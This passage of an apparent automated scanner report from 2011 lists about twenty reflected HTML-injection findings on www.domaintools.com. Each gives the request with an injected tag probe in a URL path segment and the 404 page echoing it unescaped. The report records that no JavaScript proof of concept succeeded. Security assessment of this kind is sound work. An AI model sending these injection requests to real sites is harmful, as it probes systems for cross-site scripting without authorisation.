Date: Mon, 18 Jul 2011 02:13:52 GMT
Content-Length: 12145
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=dropping-names65742"><a>0f8e51c0745">
...[SNIP]...

3.132. http://www.domaintools.com/buy/for-sale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/for-sale/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 696c9<a>dc614c1ac76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/for-sale696c9<a>dc614c1ac76/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:11 GMT
Content-Length: 12076
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>dc614c1ac76">Whois record for "for-sale696c9<a>dc614c1ac76"</a>
...[SNIP]...

3.133. http://www.domaintools.com/buy/for-sale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/for-sale/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd84c"><a>81381df8679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/for-salebd84c"><a>81381df8679/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:00 GMT
Content-Length: 12097
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=for-salebd84c"><a>81381df8679">
...[SNIP]...

3.134. http://www.domaintools.com/buy/sales-history/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/sales-history/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c670"><a>f692913b6e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/sales-history3c670"><a>f692913b6e6/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:08:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:08:58 GMT
Content-Length: 12137
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=sales-history3c670"><a>f692913b6e6">
...[SNIP]...

3.135. http://www.domaintools.com/buy/sales-history/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /buy/sales-history/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 56a15<a>766b9c39e1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /buy/56a15<a>766b9c39e1b/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:08 GMT
Content-Length: 12012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>766b9c39e1b">Whois record for "56a15<a>766b9c39e1b"</a>
...[SNIP]...

3.136. http://www.domaintools.com/go/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /go/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4afb0"><a>821b91ad92e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /go4afb0"><a>821b91ad92e/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:01 GMT
Content-Length: 12045
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=go4afb0"><a>821b91ad92e">
...[SNIP]...

3.137. http://www.domaintools.com/go/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /go/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0524<a>057f2ade439 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gob0524<a>057f2ade439/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:09:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:09:14 GMT
Content-Length: 12024
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>057f2ade439">Whois record for "gob0524<a>057f2ade439"</a>
...[SNIP]...

3.138. http://www.domaintools.com/join/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7670"><a>e7f72eae04f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joinf7670"><a>e7f72eae04f/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:25 GMT
Content-Length: 12061
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=joinf7670"><a>e7f72eae04f">
...[SNIP]...

3.139. http://www.domaintools.com/join/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3dc77<a>dac8a1db3f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /join3dc77<a>dac8a1db3f3/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:37 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:37 GMT
Content-Length: 12040
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>dac8a1db3f3">Whois record for "join3dc77<a>dac8a1db3f3"</a>
...[SNIP]...

3.140. http://www.domaintools.com/learn/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9be2f<a>76cd374324d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn9be2f<a>76cd374324d/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:05 GMT
Content-Length: 12048
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>76cd374324d">Whois record for "learn9be2f<a>76cd374324d"</a>
...[SNIP]...

3.141. http://www.domaintools.com/learn/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da0e5"><a>3ff88430a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learnda0e5"><a>3ff88430a0/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:13:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:13:51 GMT
Content-Length: 12061
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=learnda0e5"><a>3ff88430a0">
...[SNIP]...

3.142. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/domain-valuation-how-to-value-a-domain-name-421/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da915<a>1e98503d392 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/da915<a>1e98503d392/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:33 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>1e98503d392">Whois record for "da915<a>1e98503d392"</a>
...[SNIP]...

3.143. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/domain-valuation-how-to-value-a-domain-name-421/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b824e"><a>c91c917f399 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/domain-valuation-how-to-value-a-domain-name-421b824e"><a>c91c917f399/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:17 GMT
Content-Length: 12314
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=domain-valuation-how-to-value-a-domain-name-421b824e"><a>c91c917f399">
...[SNIP]...

3.144. http://www.domaintools.com/learn/help/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/help/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d137"><a>7761a428b92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/help7d137"><a>7761a428b92/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:27 GMT
Content-Length: 12069
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=help7d137"><a>7761a428b92">
...[SNIP]...

3.145. http://www.domaintools.com/learn/help/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/help/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54f59<a>9382288a0d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/help54f59<a>9382288a0d7/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:41 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:42 GMT
Content-Length: 12048
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>9382288a0d7">Whois record for "help54f59<a>9382288a0d7"</a>
...[SNIP]...

3.146. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1771<a>e9278b394c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/b1771<a>e9278b394c3/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:43 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>e9278b394c3">Whois record for "b1771<a>e9278b394c3"</a>
...[SNIP]...

3.147. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee5d"><a>050e6ab67a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-4223ee5d"><a>050e6ab67a6/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:30 GMT
Content-Length: 12394
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=how-do-i-buy-a--domain-name-currently-owned-by-someone-else-4223ee5d"><a>050e6ab67a6">
...[SNIP]...

3.148. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/what-is-whois-information-and-why-is-it-valuable-419/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f44aa<a>5111866423e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/f44aa<a>5111866423e/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:48 GMT
Content-Length: 12016
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>5111866423e">Whois record for "f44aa<a>5111866423e"</a>
...[SNIP]...

3.149. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /learn/what-is-whois-information-and-why-is-it-valuable-419/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6f18"><a>ce2b449055a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /learn/what-is-whois-information-and-why-is-it-valuable-419a6f18"><a>ce2b449055a/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:33 GMT
Content-Length: 12339
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=what-is-whois-information-and-why-is-it-valuable-419a6f18"><a>ce2b449055a">
...[SNIP]...

3.150. http://www.domaintools.com/monitor/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef6de<a>d3496a250c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /monitoref6de<a>d3496a250c3/ HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:14:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 18 Jul 2011 02:14:36 GMT
Content-Length: 12064
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>d3496a250c3">Whois record for "monitoref6de<a>d3496a250c3"</a>
...[SNIP]...

3.151. http://www.domaintools.com/monitor/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /monitor/

Issue detail

